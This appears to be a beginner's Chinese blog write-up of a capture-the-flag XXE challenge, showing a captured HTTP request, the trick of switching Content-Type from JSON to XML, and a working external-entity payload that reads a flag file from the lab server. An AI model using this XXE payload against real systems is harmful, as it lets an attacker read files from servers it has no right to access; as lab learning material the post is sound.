xxe 新手学习记录

在做某题时遇到了xxe漏洞,学习+记录
这里因为环境暂时关了,现在复现不了,所以在网络上又找到了一些xxe题目环境
这里有 PikaChu靶场里的xxe环境,这个环境可以在BUUCTF里开,但是这里我们又找到了另一个环境,(不能保证环境一定稳定)
环境链接(有需要访问的注意,环境来源于网络)
介绍xxe的博客
关于这道题目,我的解题:

0x00

进入环境就发现了个按钮,那肯定是要打开burp然后点击按钮啊!

1
查看请求数据包

POST /api/v1.0/try HTTP/1.1
Host: web.jarvisoj.com:9882
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/json
Content-Length: 36
Origin: http://web.jarvisoj.com:9882
Connection: close
Referer: http://web.jarvisoj.com:9882/

{"search":"type sth!","value":"own"}

可以看到这个Content-Type: application/json,而我们要利用这个漏洞,就要把这个键值对改为,Content-Type: application/xml,下面就能写xxe利用代码了,这里我只是简单地学了一下,所以我就只记录了简单的读取靶机文件的xmlpayload

0x01

这里的利用代码,再利用时,只需要更改一部分,就是要读取的文件SYSTEM后的内容。

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE user [
 <!ENTITY xxe SYSTEM "./flag.txt">
 ]>
<user>&xxe;</user>

在burp的repeater模块的响应头里发现了flag
2
读取文件不是很难,但是命令执行的话,暂时不会,找时间补一下

先鸽鸽,鸽鸽再说。         ——鸽de

posted @ 2020-05-12 21:25  M4xlmum  阅读(143)  评论(0编辑  收藏  举报